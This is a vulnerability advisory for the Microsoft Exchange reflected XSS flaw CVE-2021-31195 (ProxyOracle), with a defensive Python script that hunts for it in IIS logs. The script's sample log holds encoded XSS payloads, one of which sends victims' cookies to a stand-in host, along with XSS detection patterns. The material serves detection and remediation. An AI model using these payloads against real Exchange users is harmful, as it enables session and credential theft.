Microsoft Exchange - Reflected Cross-Site Scripting (ProxyOracle - CVE-2021-31195)
- Severity
- CVSSv3 Score
- 8.8
- Vulnerability description
Microsoft Exchange Server is affected by a reflected Cross-Site Scripting (XSS) vulnerability at the /owa/auth/frowny.aspx endpoint. The root cause is missing input validation and output encoding in the Client Access Service (CAS) frontend: attacker-controlled content from the request URI is reflected into the response without sanitization, so a crafted link can inject JavaScript that executes in the victim's browser within the origin of the Exchange web front end (OWA).
- Risk description
The risk exists that a remote, unauthenticated attacker sends a crafted URL to Exchange users; when a user opens it, the injected script runs in their browser in the OWA context and can read or set their Exchange session cookies. In the ProxyOracle chain, the stolen cookies are then decrypted through the companion padding-oracle flaw in Exchange's cookie parsing (CVE-2021-31196), which recovers the user's plaintext username and password. On its own the XSS does not disclose credentials in clear text; it is the cookie theft that enables the chain.
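As an added example, not part of this advisory and not Microsoft's or Pentest-Tools' code, the following Python script scans an IIS W3C access log for requests to the /owa/auth/frowny.aspx endpoint whose query string, after percent-decoding (including double encoding), carries common reflected-XSS indicators. The log lines, client addresses and query parameter names (msg, url, app, et, esrc, te) are constructed for the example; the real parameter names reflected by frowny.aspx may differ, and the script looks for payload shapes rather than for the specific injection point, so a hit is a lead to investigate, not proof of exploitation.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not real traffic). The field layout is the
# default IIS format; the query parameter names are assumptions for the example.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2021-05-12 08:01:13 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example.test%2fowa%2f&reason=0 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 31
2021-05-12 08:02:05 10.0.0.5 GET /owa/auth/frowny.aspx app=people&et=ServerError&esrc=MasterPage&te=1 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 15
2021-05-12 08:03:22 10.0.0.5 GET /owa/auth/frowny.aspx msg=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F198.51.100.7%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E 443 - 198.51.100.7 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 12
2021-05-12 08:03:24 10.0.0.5 GET /owa/auth/frowny.aspx msg=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 443 - 198.51.100.7 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 11
2021-05-12 08:03:51 10.0.0.5 GET /OWA/auth/Frowny.aspx url=javascript%3Aalert(1) 443 - 198.51.100.7 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 10
2021-05-12 08:04:10 10.0.0.5 GET /owa/auth/logon.aspx url=%3Cscript%3Ealert(1)%3C%2Fscript%3E 443 - 198.51.100.7 Mozilla/5.0+(X11;+Linux+x86_64) - 200 0 0 9
"""

# Generic reflected-XSS payload shapes; checked against the decoded query string.
XSS_INDICATORS = {
    "script-tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),          # onerror=, onload=, ...
    "html-injection": re.compile(r"<\s*(img|svg|iframe|body|object|embed)\b", re.I),
}


def decode_query(query: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly until stable so double-encoded payloads surface."""
    text = query
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def parse_iis_log(text: str):
    """Yield one dict per W3C log entry, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or malformed entry: skip rather than misalign columns
        yield dict(zip(fields, parts))


def find_frowny_xss(log_text: str, endpoint: str = "/owa/auth/frowny.aspx"):
    """Return requests to the frowny.aspx endpoint whose decoded query carries XSS indicators.

    The path is compared case-insensitively because IIS routes paths that way.
    """
    hits = []
    for rec in parse_iis_log(log_text):
        if rec["cs-uri-stem"].lower() != endpoint.lower():
            continue
        query = rec["cs-uri-query"]
        if query == "-":  # IIS writes "-" for an empty query string
            continue
        decoded = decode_query(query)
        indicators = [name for name, rx in XSS_INDICATORS.items() if rx.search(decoded)]
        if indicators:
            hits.append({
                "timestamp": f"{rec['date']} {rec['time']}",
                "client": rec["c-ip"],
                "status": rec["sc-status"],
                "query": decoded,
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in find_frowny_xss(SAMPLE_IIS_LOG):
        print(f"{hit['timestamp']} {hit['client']} HTTP {hit['status']} "
              f"[{', '.join(hit['indicators'])}] {hit['query']}")
```

Run against real logs by replacing SAMPLE_IIS_LOG with the contents of the Exchange front-end site's W3C log files (the default IIS logging directory). Decoding is repeated because attackers commonly double-encode payloads to slip past single-pass filters, and the check is scoped to the vulnerable endpoint so that the large volume of ordinary OWA traffic does not produce noise; widen the endpoint parameter if you also want to hunt for the same payload shapes elsewhere.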
- Recommendation
Applying the latest Microsoft security update for Exchange Server fixes this vulnerability; the fix shipped in the May 2021 Exchange Server Security Updates. Security Updates only install on a supported Cumulative Update, so bring the server to a supported CU first, then verify the installed build number against Microsoft's published Exchange build table after patching. Until the update is applied, treat links to /owa/auth/frowny.aspx with unexpected query strings as suspicious, and note that a network scanner can only infer exposure from the server version, not confirm exploitation.
- Codename
- ProxyOracle
- Detectable with
- Network Scanner
- Exploitable with Sniper
- No
- Vuln date
- May 2021
- Published at
- Updated at
- Software Type
- Email server
- Vendor
- Microsoft
- Product
- Exchange Server